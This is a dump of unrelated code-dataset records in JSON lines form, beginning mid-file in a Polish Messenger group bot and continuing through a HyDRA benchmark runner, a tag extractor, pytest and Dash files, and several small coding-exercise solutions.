Książe Krwi Królewskiej Robert*\"), thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\n        elif message_object.text in (\"krzychu\", \"krzych\", \"krzysiek\") and thread_type == ThreadType.GROUP and thread_id == \"2458017120955707\":\r\n            self.send(Message(text=\"Dla Ciebie Jaśnie Wielmożny Hrabia Krzysztof*\"), thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\n        elif message_object.text in (\"Gronek\", \"Bronek\", \"Broniu\", \"broniu\", \"bronek\", \"gronek\", \"Groniu\") and thread_type == ThreadType.GROUP and thread_id == \"2458017120955707\":\r\n            self.sendLocalImage(\r\n                \"gronek2.jpg\",\r\n                thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\n    def onPersonRemoved(self, removed_id, author_id, thread_id, **kwargs):\r\n        \r\n        if (\r\n            removed_id != self.uid\r\n            and author_id != self.uid\r\n        ):\r\n            log.info(\"{} ktoś nam spierdolił. Zaraz go dodam!\".format(removed_id))\r\n            self.addUsersToGroup(removed_id, thread_id=thread_id) \r\n            self.send(Message(text=\"Nie tym razem byczq\"), thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\nclient = PakerBot(variable)\r\nclient.listen()\r\n\r\n    # and message_object.text == \"!ucieczka\"","sub_path":"pakerbot.py","file_name":"pakerbot.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"316554262","text":"#!/usr/bin/env python3\n\"\"\"\nRun multiple benchmarks consecutively.\nRequired arguments (positional):\n tool: The path to the tool (hydra) executable\n settings: Path to a text file that contains the command line\n arguments for the benchmarks to run. For example, if hydra\n should be called with\n `./bin/hydra -m bball.model -r support_function --setting BoxLinearOptimizationOn`\n then the settings file should contain a line\n `-m bball.model -r support_function --setting BoxLinearOptimizationOn`\n Paths to the model (-m) should be given relative to the settings file.\n Empty lines and lines that start with '#' are ignored.\n output: Path to a file to write the output to. The output will\n be given in csv-format with the measured time, safety result and\n error messages if an error occurred.\nOptional arguments:\n -t A time limit in seconds. If the execution of a benchmark\n model takes longer than the given time it will be terminated.\n This is indicated in the output.\n -m A memory limit in megabyte. If the execution of a benchmark\n model uses more space than allowed it will be terminated.\n This is NOT indicated in the output but will cause an error \n in the tool execution and the error message has to be interpreted.\n --verbose Verbose execution: The output of the tool will be printed.\n --benchmark Faster execution: The output is written to a file and analyzed\n after execution is complete. 
This lowers runtime but disables\n the timeout and verbose option as well as skipping functionality.\n (These arguments are ignored.)\nExample calls:\n (1) `python3 run_hydra.py ../bin/hydra input/settings results.csv -t 1200 -m 16000 --verbose`\n Call for testing models with a timeout of 20min and memout of 16gb with verbose mode.\n (2) `python3 run_hydra.py ../bin/hydra input/settings results.csv --benchmark`\n Call for benchmarking and faster execution. Adding the timeout or verbose option\n will have no effect.\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport subprocess\nimport time\nimport re\nimport csv\nimport json\nimport select\nimport fcntl\nimport resource\nimport tempfile\n\ndef limit_mem(memLimit):\n \"\"\"Limit the memory-usage to memLimit (in MB).\"\"\"\n if memLimit:\n memLimit = memLimit * 1024 * 1024\n resource.setrlimit(\n resource.RLIMIT_AS, (memLimit, resource.RLIM_INFINITY))\n\ndef read_file(fileName):\n \"\"\"Return the lines of the file as a list. Lines that start with\n '#' and empty lines are ignored. Multiple whitespaces are removed\n from lines and lines are stripped.\"\"\"\n with open(fileName, 'r') as f:\n lines = [\" \".join(line.split()) for line in f]\n return list(filter(lambda l: l != '' and not l.startswith('#'), lines))\n\nclass Results(object):\n \"\"\"Stores results from a model execution.\"\"\"\n def __init__(self, modelName, instance=''):\n self.modelName = modelName\n self.instance = instance\n self.startTime = -1\n self.endTime = -1\n self.timeout = False\n self.skipped = False\n self.safetyResult = None\n self.error = False\n self.errorMsg = None\n\n def set_error(self, errorMsg):\n self.error = True\n self.errorMsg = errorMsg.strip()\n\n def get_csv_header():\n h = ['Tool', 'Benchmark ID', 'Instance', 'Verified', 'Time']\n return h\n\n def get_csv_footer():\n f = ['End of HyDRA']\n return f\n\n def to_csv(self):\n line = [\n 'HyDRA',\n self.modelName.replace('.model',''),\n self.instance,\n '1' if self.safetyResult == 'Safe' else '0',\n str(self.endTime - self.startTime) \\\n if self.endTime > 0 and self.startTime > 0 else ''\n ]\n return line\n\n def to_string(self):\n runningTime = str(self.endTime - self.startTime) \\\n if self.endTime > 0 and self.startTime > 0 else ''\n head = self.modelName + \": \"\n body = [\n self.safetyResult or \"No safety result\",\n \"running time: \" + runningTime,\n \"Error: \" + self.errorMsg if self.error else None\n ]\n return head + \", \".join(filter(None, body))\n\nclass Model(object):\n def __init__(self, clString, name=None):\n self.clString = clString\n self.name = name or self._get_name(clString)\n\n def _get_name(self, clString):\n clArgs = clString.split(' ')\n name = os.path.basename(clArgs[clArgs.index('-m')+1])\n return name\n\n def run(self, benchmark, *args, **kwargs):\n \"\"\"Run the model with the given parameters and return the results.\"\"\"\n result = Results(self.name)\n result.startTime = time.time()\n if benchmark:\n print('[+] Running %s.'%self.name)\n self._run_benchmark(result, *args, **kwargs)\n else:\n print('[+] Running %s. 
Press enter to skip.'%self.name)\n self._run_test(result, *args, **kwargs)\n result.endTime = time.time()\n return result\n\n def _run_test(self, result, tool, timeLimit, memLimit, verbose):\n params = self.get_process_params(tool)\n process = subprocess.Popen(\n params, stdout=subprocess.PIPE, stderr=subprocess.PIPE, \n universal_newlines=True, preexec_fn=lambda: limit_mem(memLimit))\n # Make stdout non-blocking to enable reading during execution (to avoid\n # filling the pipe and losing output), while also checking for timeouts \n # and skips.\n pStdoutFlags = fcntl.fcntl(process.stdout, fcntl.F_GETFL)\n fcntl.fcntl(process.stdout, fcntl.F_SETFL, pStdoutFlags | os.O_NONBLOCK)\n\n while process.poll() is None:\n for line in process.stdout.readlines():\n self._parse_line(result, line, verbose)\n if self._check_skip(result):\n self._stop_run(process)\n print('[+] Skipped %s'%self.name)\n if self._check_timeout(result, timeLimit):\n print('[-] Timeout %s'%self.name)\n self._stop_run(process)\n # Read errors after process is done because stderr usually fits in \n # the pipe.\n errors = process.stderr.readlines()\n if errors:\n print('[-] Errors during execution: ')\n result.set_error(errors[0])\n for line in errors:\n print(line, end='')\n return result\n\n def _run_benchmark(self, result, tool, timeLimit, memLimit, verbose):\n stdoutFile = tempfile.TemporaryFile(mode='w+')\n stderrFile = tempfile.TemporaryFile(mode='w+')\n params = self.get_process_params(tool)\n process = subprocess.Popen(\n params, stdout=stdoutFile, stderr=stderrFile, \n universal_newlines=True, preexec_fn=lambda: limit_mem(memLimit))\n process.wait()\n stdoutFile.seek(0)\n stderrFile.seek(0)\n self._parse_output(result, stdoutFile, stderrFile)\n return result\n\n def _parse_output(self, result, stdoutFile, stderrFile):\n for line in stdoutFile:\n self._parse_line(result, line, False)\n errors = stderrFile.readlines()\n if errors:\n print('[-] Errors during execution: ')\n result.set_error(errors[0])\n for line in errors:\n print(line, end='')\n return result\n\n def get_process_params(self, tool):\n \"\"\"Build subprocess parameters from clString and tool path.\"\"\" \n hydraArgs = self.clString.split(' ')\n cmd = ['stdbuf', '-oL', tool] + hydraArgs\n return cmd\n\n def _stop_run(self, process):\n process.terminate()\n process.wait()\n return True \n\n def _check_skip(self, result):\n \"\"\"Check if enter was pressed to skip execution.\"\"\"\n if select.select([sys.stdin], [], [], 0)[0] != []:\n sys.stdin.readline()\n result.skipped = True\n return True\n else:\n return False\n\n def _check_timeout(self, result, timeLimit):\n if timeLimit is None:\n return False\n elif time.time() - result.startTime > timeLimit:\n result.timeout = True\n return True \n\n def _parse_line(self, result, line, verbose):\n if line.strip() == \"Could not verify safety.\":\n result.safetyResult = 'Unsafe'\n elif line.strip() == \"The model is safe.\":\n result.safetyResult = 'Safe'\n if verbose:\n print(line, end='')\n\ndef get_cli_args():\n parser = argparse.ArgumentParser(\n description='Run the models given in the settings file with the given '+\\\n 'tool and write the results to the output file.',\n epilog='Example call: %(prog)s ../bin/hydra input/settings results.csv '+\\\n '-t 1200 -m 16000 --verbose') \n parser.add_argument(\n 'tool', metavar='path', help='Path to the tool executable')\n parser.add_argument(\n 'settings', metavar='settings-file', \n help='Filename that contains the command line arguments.')\n parser.add_argument(\n 
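# (descriptive note) main() below writes one ';'-separated csv row per benchmark model\n        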
'output', metavar='output-file', \n help='File to write results to (as csv).')\n parser.add_argument(\n '-t', dest='timeLimit', metavar='seconds', type=int, default=None,\n help='Time limit for a single model execution (in seconds).')\n parser.add_argument(\n '-m', dest='memLimit', metavar='megabyte', type=int, default=None,\n help='Memory limit for a single model execution (in mb).')\n parser.add_argument(\n '--verbose', action='store_true', \n help='Write the tool-output to stdout.')\n parser.add_argument(\n '--benchmark', action='store_true',\n help='Option for benchmarking that enables faster execution '+\\\n 'by reading tool output after execution. Disables timeout and '+\\\n 'verbose option as well as skipping models.')\n args = parser.parse_args()\n return args\n\ndef main():\n args = get_cli_args()\n tool = os.path.abspath(os.path.expanduser(args.tool))\n settingsFile = os.path.abspath(os.path.expanduser(args.settings))\n settingsDir = os.path.dirname(settingsFile)\n outputFile = os.path.abspath(os.path.expanduser(args.output))\n os.chdir(settingsDir)\n settingsList = read_file(settingsFile)\n resultList = []\n for s in settingsList:\n m = Model(s)\n result = m.run(args.benchmark, tool, args.timeLimit, \n args.memLimit, args.verbose)\n resultList.append(result) \n csvWriter = csv.writer(open(outputFile, 'w'), delimiter=';')\n #csvWriter.writerow(Results.get_csv_header())\n print(\"Results:\")\n for result in resultList:\n csvWriter.writerow(result.to_csv())\n print(result.to_string())\n #csvWriter.writerow(Results.get_csv_footer())\n\nif __name__=='__main__':\n main()\n","sub_path":"examples/arch21/run_hydra.py","file_name":"run_hydra.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"205465273","text":"\nimport sys, imp\nimport logging\n\nlog = logging.getLogger(__name__)\n\ndef load_module(module_name, path = None):\n \"\"\"Load and return the given module, recursively loading containing packages as necessary.\"\"\"\n if module_name in sys.modules:\n log.debug('module %r already loaded' % module_name)\n return sys.modules[module_name]\n \n spec_components = list(reversed(module_name.split('.')))\n qname_components = []\n mod_chain = []\n while spec_components:\n next_component = spec_components.pop(-1)\n qname_components.append(next_component)\n \n try:\n parent = mod_chain[-1]\n path = parent.__path__\n except IndexError:\n parent = None\n\n # This will raise ImportError if next_component is not found\n # (as one would hope)\n log.debug('find_module({!r},{!r})'.format(next_component,path)) \n (fp, pathname, desc) = imp.find_module(next_component, path)\n \n qname = '.'.join(qname_components)\n try:\n module = imp.load_module(qname, fp, pathname, desc)\n finally:\n try:\n fp.close()\n except AttributeError:\n pass\n \n # make the module appear in sys.modules\n sys.modules[qname] = module\n mod_chain.append(module)\n \n # Make the module appear in the parent module's namespace\n if parent:\n setattr(parent, next_component, module)\n \n log.debug('module %r loaded' % qname)\n\n return module\n\ndef get_object(object_name, path=None):\n \"\"\"Attempt to load the given object, using additional path information if given.\"\"\"\n\n try:\n (modspec, symbol) = object_name.rsplit('.', 1)\n except ValueError:\n # no period found\n raise ValueError(\"object_name name must be in the form 'module.symbol'\")\n \n log.debug('attempting to load %r from %r' % (symbol, modspec))\n module = 
load_module(modspec, path)\n \n # This will raise AttributeError (as expected) if the symbol is not in the module\n return getattr(module, symbol)\n","sub_path":"lib/west_tools/westpa/extloader.py","file_name":"extloader.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"82756699","text":"import re\nimport unittest\n\n__all__ = [ 'extractTags', 'displayTags', 'replaceInternal', 'isSymbol' ]\n\nRAW_TAGS = [\n # General types of story\n { 'tag': 'video(s)', 'host': { 'youtube.com', 'vimeo.com' } },\n 'music', \n 'audio', \n 'tutorial(s)', \n 'media', \n 'rfc',\n { 'tag': 'release', 'alt': { 'released', 'releases' } },\n 'game(s)',\n\n # General concepts\n 'algorithm(s)', \n 'compiler(s)', \n { 'tag': '3d', 'alt': ['3 d', 'three dimension(s)', 'three dimensional'] }, \n 'hash', \n 'web', \n 'api',\n 'spam',\n\n # Concrete concepts\n 'drm', \n 'nosql', \n 'sql', \n 'copyright(s)', \n 'trademark(s)', \n 'patent(s)', \n 'encryption', \n 'economy', \n 'investing',\n 'privacy', \n 'autism', \n 'lawsuit', \n 'universe', \n 'assembler(s)', \n 'proxy', \n 'censorship', \n 'firewall', \n 'trial',\n 'piracy', \n 'ipo(s)', \n 'graphics', \n 'embedded', \n 'art', \n 'kernel', \n 'antimatter', \n 'compression',\n 'font(s)',\n 'concurrency',\n 'beer',\n { 'tag': 'debugging', 'alt': [ 'debugger', 'debug', 'debugs' ]},\n\n # Orgs\n 'amd', \n 'intel', \n 'apple', \n 'facebook', \n 'google', \n 'yahoo', \n { 'tag': 'microsoft', 'host': [ 'msdn.com' ] }, \n 'twitter', \n 'zynga',\n \n 'techcrunch', \n 'htc', \n 'amazon', \n 'mozilla', \n 'dell', \n 'nokia', \n 'novell', \n 'lenovo', \n 'nasa',\n \n 'ubuntu', \n 'adobe', \n 'github', \n 'cisco', \n 'motorola', \n 'samsung', \n 'verizon', \n { 'symbol': 'at&t', 'internal': 'atandt' },\n 'sprint', \n 'tmobile',\n \n 'instagram', \n 'square', \n 'stripe', \n 'anonymous', \n 'webkit', \n 'opera', \n 'tesla', \n 'redhat', \n 'centos',\n \n 'gnu', \n 'mpaa', \n 'riaa', \n 'w3c', \n 'isohunt', \n 'obama', \n 'ifpi', \n 'nsa', \n 'cia', \n 'fbi', \n 'csis', \n 'wikileaks',\n \n 'snowden', \n 'kde', \n 'gnome', \n 'comcast', \n 'fcc', \n 'china', \n 'usa', \n 'yale', \n 'navy', \n 'debian',\n \n 'spacex', \n 'turing', \n 'mit', \n 'stanford', \n 'uber', \n 'lyft', \n 'hbo', \n 'sony', \n 'fdic', \n 'ucla', \n 'canada',\n \n 'antarctica', \n 'arctic', \n 'tor', \n 'wolfram', \n 'mojang', \n 'dropbox',\n\n # Languages\n 'php', \n 'javascript', \n 'java', \n 'perl', \n 'python', \n 'ruby', \n 'html', \n 'html5',\n 'css', \n { 'tag': 'css2', 'implies': 'css' }, \n { 'tag': 'css3', 'implies': 'css' }, \n 'flash', \n 'lisp', \n { 'tag': 'clojure', 'implies': 'lisp' }, \n 'racket', \n 'scheme',\n 'arc',\n 'scala', \n 'lua', \n 'haxe', \n 'ocaml', \n 'erlang', \n 'rust', \n 'ecmascript', \n 'haskell', \n 'nim',\n 'prolog',\n { 'tag': 'go', 'alt': 'golang', 'internal': 'golang' }, \n { 'tag': 'c', 'internal': 'clanguage' }, \n { 'tag': 'd', 'internal': 'dlanguage' }, \n { 'symbol': 'c++', 'internal': 'cplusplus' },\n { 'symbol': 'c#', 'internal': 'csharp' },\n { 'symbol': 'f#', 'internal': 'fsharp' },\n 'swift',\n 'nvidia',\n\n # Technologies\n 'linux', \n 'bsd',\n 'mongodb', \n 'cassandra', \n 'hadoop', \n 'android', \n 'node',\n 'iphone', \n 'ipad', \n 'ipod', \n 'ec2', \n 'firefox', \n 'safari', \n 'servo',\n { 'tag': 'chrome', 'alt': 'chromium' }, \n 'windows', \n { 'tag': 'mac', 'alt': 'macintosh' }, \n 'osx',\n 'git', \n 'subversion', \n 'mercurial', \n { 'tag': 'neovim', 
'implies': 'vim' },\n 'vim',\n { 'tag': 'vi', 'internal': 'vieditor' },\n 'emacs', \n 'bitcoin', \n 'drupal', \n 'wordpress', \n 'unicode', \n 'pdf', \n 'wifi', \n 'phonegap', \n 'minecraft', \n 'svg', \n 'gif', \n 'png', \n 'dns', \n 'torrent',\n 'docker', \n 'drone(s)', \n 'meteor', \n 'react', \n { 'tag': 'openbsd', 'implies': 'bsd' }, \n { 'tag': 'freebsd', 'implies': 'bsd' },\n 'sass', \n 'scss', \n 'aes', \n 'rsa',\n { 'tag': 'ssl', 'implies': 'https' }, \n { 'tag': 'tls', 'implies': 'https' }, \n 'http', \n 'https',\n 'smtp', \n 'ftp', \n 'webrtc', \n 'pgp', \n 'gpg', \n 'ios', \n 'ssd', \n 'openssh', \n 'openssl',\n 'bash', \n 'ksh', \n 'zsh', \n { 'tag': 'jpeg', 'alt': 'jpg' },\n 'dbus',\n 'emoji',\n 'mysql',\n { 'tag': 'postgresql', 'alt': 'postgres' },\n 'json',\n 'xml',\n 'yaml',\n 'csv',\n 'arm',\n 'mips',\n 'gpu',\n 'awk',\n 'sed',\n 'ssh',\n 'grep',\n { 'tag': 'regex', 'alt': 'regexp' },\n 'webgl',\n 'glsl',\n { 'tag': 'gmail', 'implies': 'google' },\n\n # Frameworks\n 'django', \n 'rails', \n 'jquery', \n 'prototype', \n 'mootools', \n { 'tag': 'angular', 'alt': 'angularjs' },\n { 'tag': 'ember', 'alt': 'emberjs' }\n]\n\nTAGS = {}\nSYMBOLS = {}\nDISPLAY = {}\nINTERNAL = {}\n\n# Replaces a token that matches an internal's display token with the internal representation\ndef replaceInternal(tokens):\n return [INTERNAL[tag] if INTERNAL.has_key(tag) else tag for tag in tokens]\n\ndef displayTags(tags):\n return [DISPLAY[tag] if DISPLAY.has_key(tag) else tag for tag in tags]\n\ndef isSymbol(token):\n return SYMBOLS[token]['tags'][0] if SYMBOLS.has_key(token) else None\n\n# Note that this may return duplicates\ndef extractTags(s):\n tags = []\n s = s.lower()\n for symbol in SYMBOLS.keys():\n if s.find(symbol) != -1:\n # Eat the symbol so we don't match on it any more\n s = s.replace(symbol, '')\n tags += SYMBOLS[symbol]['tags']\n\n for bit in re.split(\"[^A-Za-z0-9]+\", s):\n if TAGS.has_key(bit):\n tags += TAGS[bit]['tags']\n\n return tags\n\nfor tag_entry in RAW_TAGS:\n if type(tag_entry) == str:\n tag_entry = { 'tag': tag_entry }\n\n symbol = tag_entry.has_key('symbol')\n if symbol:\n tag = tag_entry['symbol']\n else:\n tag = tag_entry['tag']\n output = {}\n\n # Reverse map\n if tag_entry.has_key('internal'):\n DISPLAY[tag_entry['internal']] = tag\n INTERNAL[tag] = tag_entry['internal']\n\n # plural?\n if tag.find('(s)') != -1:\n root = tag.replace('(s)', '')\n input = [ root, root + 's' ]\n output['tags'] = [ root ]\n else:\n input = [ tag ]\n if tag_entry.has_key('internal'):\n output['tags'] = [ tag_entry['internal'] ]\n else:\n output['tags'] = [ tag ]\n\n # implies adds additional output tags for a given input\n if tag_entry.has_key('implies'):\n implies = tag_entry['implies']\n if type(implies) == str:\n output['tags'] += [ implies ]\n else:\n output['tags'] += implies\n\n # alt adds additional input tags for a given output\n if tag_entry.has_key('alt'):\n alt = tag_entry['alt']\n if type(alt) == str:\n input += [ alt ]\n else:\n for alt in tag_entry['alt']:\n if alt.find('(s)') != -1:\n root = alt.replace('(s)', '')\n input += [ root, root + 's' ]\n else:\n input += [ alt ]\n\n if symbol:\n for tag in input:\n if SYMBOLS.has_key(tag):\n raise Exception('Duplicate symbol: ' + tag)\n SYMBOLS[tag] = output\n else:\n for tag in input:\n if TAGS.has_key(tag):\n raise Exception('Duplicate tag: ' + tag)\n TAGS[tag] = output\n\n\nclass TestTags(unittest.TestCase):\n def test_simple(self):\n self.assertEqual(['rust'], extractTags(\"I love Rust!\"))\n\n def test_plural(self):\n 
self.assertEqual(['video'], extractTags(\"Good old video\"))\n self.assertEqual(['video'], extractTags(\"Good old videos\"))\n\n def test_plural_dupe(self):\n self.assertEqual(set(['video']), set(extractTags(\"Good old video and videos\")))\n\n def test_alt(self):\n self.assertEqual(['chrome'], extractTags(\"Chromium is a project\"))\n self.assertEqual(['angular'], extractTags(\"AngularJS is fun\"))\n\n def test_alt_dupe(self):\n self.assertEqual(set(['chrome']), set(extractTags(\"Chromium is the open Chrome\")))\n\n def test_implies(self):\n self.assertEqual(['neovim', 'vim'], extractTags(\"Neovim is kind of cool\"))\n\n def test_implies_dupe(self):\n self.assertEqual(set(['neovim', 'vim']), set(extractTags(\"Neovim is a kind of vim\")))\n\n def test_internal(self):\n self.assertEqual(['clanguage'], extractTags(\"C is hard\"))\n self.assertEqual(['dlanguage'], extractTags(\"D is hard\"))\n\n def test_symbol(self):\n self.assertEqual(['csharp'], extractTags(\"C# is hard\"))\n self.assertEqual(['cplusplus'], extractTags(\"C++ is hard\"))\n self.assertEqual(['atandt'], extractTags(\"AT&T has an ampersand\"))\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":8854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"308696475","text":"# -*- coding: utf-8 -*-\n#\n\nimport os\nimport logging\nimport pytest\nimport time\n\nfrom datetime import datetime\nfrom selenium import webdriver\n\nfrom selenium.webdriver.chrome.options import Options\n\n\nlogging.basicConfig(filename='./webui-auto-allure-test.log', level=logging.INFO, format=\"%(asctime)s [%(levelname)s] [%(module)s:%(lineno)d] [%(name)s]: %(message)s\")\n\ndef pytest_addoption(parser):\n parser.addoption('--language', action='store', default='en',\n help='Please choose localization language')\n parser.addoption('--browser', action='store', default=\"chrome\",\n help=\"Choose browser: chrome or firefox\")\n\n\n@pytest.fixture(scope='function')\ndef browser(request):\n browser_name = request.config.getoption('browser').lower()\n if browser_name == 'chrome':\n logging.info('start chrome browser for test..')\n chrome_options = webdriver.ChromeOptions()\n locale = request.config.getoption('language')\n logging.info(f\"`{locale}` locale selected\")\n chrome_options.add_argument(f\"--lang={locale}\")\n chrome_options.add_experimental_option('prefs', {'intl.accept_languages': locale})\n browser = webdriver.Chrome(options=chrome_options)\n elif browser_name == 'firefox':\n logging.info('start firefox browser for test..')\n browser = webdriver.Firefox()\n else:\n raise NotImplemented(\"Browser {} still is not implemented\".format(browser_name))\n\n yield browser\n\n logging.info('quit browser...')\n browser.quit()\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"340488951","text":"#\n# @lc app=leetcode id=513 lang=python3\n#\n# [513] Find Bottom Left Tree Value\n#\n# https://leetcode.com/problems/find-bottom-left-tree-value/description/\n#\n# algorithms\n# Medium (63.74%)\n# Likes: 1609\n# Dislikes: 190\n# Total Accepted: 144.5K\n# Total Submissions: 226.7K\n# Testcase Example: '[2,1,3]'\n#\n# Given the root of a binary tree, return the leftmost value in the last row of\n# the tree.\n# \n# \n# Example 1:\n# \n# \n# Input: root = [2,1,3]\n# Output: 1\n# \n# \n# Example 
2:\n# \n# \n# Input: root = [1,2,3,4,null,5,6,null,null,7]\n# Output: 7\n# \n# \n# \n# Constraints:\n# \n# \n# The number of nodes in the tree is in the range [1, 10^4].\n# -2^31 <= Node.val <= 2^31 - 1\n# \n# \n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nimport collections\nclass Solution:\n # solution: BFS - Your runtime beats 65.5 % of python3 submissions\n def findBottomLeftValue(self, root: Optional[TreeNode]) -> int:\n if not root:\n return -1\n\n queue = collections.deque([root])\n ans = root.val\n while queue:\n size = len(queue)\n isFirst = False\n for _ in range(size):\n node = queue.popleft()\n if not isFirst:\n ans = node.val\n isFirst = True\n\n if node.left:\n queue.append(node.left)\n \n if node.right:\n queue.append(node.right)\n \n return ans\n \n\n\n \n# @lc code=end\n\n","sub_path":"Python/513.find-bottom-left-tree-value.py","file_name":"513.find-bottom-left-tree-value.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"474682367","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 28 15:04:48 2021\r\ngitRequest.py - fetch user git repos and numbers of commits per repo\r\n@author: nicholas mirarchi\r\n\"\"\"\r\nimport requests \r\nimport os \r\nimport unittest \r\nimport json \r\n\r\n\r\ndef repository_info(username):\r\n url_for_user='https://api.github.com/users/{}/repos'.format(username)\r\n op=[]\r\n response = requests.get(url_for_user)\r\n if response.status_code != 200:\r\n print(\"Error... Account not found or no repos exist\")\r\n return False\r\n jsonData = json.loads(response.text)\r\n op.append('User: {}'.format(username))\r\n #print(op)\r\n counter=0\r\n try:\r\n for i in jsonData:\r\n repo = jsonData[counter]['name']\r\n url2 = 'https://api.github.com/repos/{}/{}/commits'.format(username, repo)\r\n response2 = requests.get(url2)\r\n response_json = json.loads(response2.text)\r\n #print(len(response_json))\r\n op.append('Repo: {} Number of commits: {}'.format(repo, len(response_json)))\r\n counter+=1\r\n except (TypeError, KeyError, IndexError):\r\n return False\r\n for i in op:\r\n print(i)\r\n return True\r\n\r\n \r\ndef main():\r\n username = input(\"Enter the user Github ID here: \")\r\n repository_info(username)\r\n #token = input(\"Enter Github access token here: \")\r\n#username='nmirarchi12'\r\n\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"HW-04a/gitRequest.py","file_name":"gitRequest.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"250312959","text":"import os\nimport tarfile\n\nhere = os.path.dirname(os.path.abspath(__file__))\n\nfor model in ['null', 'default', '65']:\n for plot_kind in ['metabolite_limitation', 'secretion_keff_sweep',\n 'default', 'glucose_limited']:\n tar_filename = '%s/community_sims_output_%s_keffs/%s.tar.gz' % (here, model, plot_kind)\n if os.path.exists(tar_filename):\n tarfile.open(tar_filename).extractall('%s/community_sims_output_%s_keffs' %\n (here, model))","sub_path":"scripts_figures_and_tables/unpack_community_me_sims.py","file_name":"unpack_community_me_sims.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"295188032","text":"from collections import 
Counter\r\n\r\nn = int(input())\r\ns = [input() for _ in range(n)]\r\n\r\nc = Counter(s)\r\n\r\nans = \"\"\r\nt = 0\r\nfor x,y in c.items():\r\n if y > t:\r\n t = y\r\n ans = x\r\nprint(ans)","sub_path":"Source Codes/AtCoder/abc008/B/4928123.py","file_name":"4928123.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"387765820","text":"import dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport plotly.graph_objects as go\nimport pandas as pd\nfrom dash.dependencies import Input, Output\nimport numpy as np\nimport pickle\nimport dash_table\n# from dash_dashboards_files.helper_functions import userchoice_based_movie_recommendation\nimport netflix as nmr\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\nmovies_df = nmr.reading_movie_title_csv()\n\ncolors = {\n 'background': 'white',\n 'background1': 'light blue',\n 'text': 'black'\n}\n\n# noinspection PyPackageRequirements,PyPackageRequirements,PyPackageRequirements\ntab2_layout = html.Div(style={'backgroundColor': colors['background']}, children=[\n html.Div(className='div-user-controls',\n children=[\n html.Div(\n className='div-for-dropdown-and-table',\n children=[\n dcc.Dropdown(id='movie_list_input2', options=nmr.get_options(movies_df['Display'].unique()),\n value=[movies_df['Display'].iloc[206]], searchable=True\n )\n ]\n )\n ]\n ),\n html.Div(id='output',\n className='row',\n children=[html.Div(id='my-table2',\n className='six columns')\n ]\n )\n\n]\n)\n\n\n","sub_path":"bingewatch/tab2_dummy.py","file_name":"tab2_dummy.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"216443396","text":"import re\nfrom pathlib import Path\n\nimport pytest\n\nfrom robocop import Config, Robocop\n\n\n@pytest.mark.parametrize(\n \"configuration, expected\",\n [\n (\"not-allowed-char-in-name:pattern:[:]\", re.compile(r\"[:]\")),\n (None, re.compile(r\"[\\.\\?]\")),\n (\"not-allowed-char-in-name:pattern:[:%#]\", re.compile(r\"[:%#]\")),\n (\"not-allowed-char-in-name:pattern:[^a-z]\", re.compile(r\"[^a-z]\")),\n ],\n)\nclass TestConfigureRule:\n def test_configure_with_two_semicolons(self, configuration, expected):\n config = Config(root=str(Path(__file__).parent))\n config.configure = [configuration] if configuration else []\n config.include = [\"not-allowed-char-in-name\"]\n robocop_runner = Robocop(config=config)\n robocop_runner.reload_config()\n # find rule and then associated checker([1]), and compare param\n assert robocop_runner.rules[\"not-allowed-char-in-name\"][1].pattern == expected\n","sub_path":"tests/utest/test_configure_rule.py","file_name":"test_configure_rule.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"72837106","text":"# Assignment 2 - Puzzle Game\n#\n# CSC148 Fall 2015, University of Toronto\n# Instructor: David Liu\n# ---------------------------------------------\n\"\"\"Word ladder module.\n\nRules of Word Ladder\n--------------------\n1. You are given a start word and a target word (all words in this puzzle\n are lowercase).\n2. Your goal is to reach the target word by making a series of *legal moves*,\n beginning from the start word.\n3. 
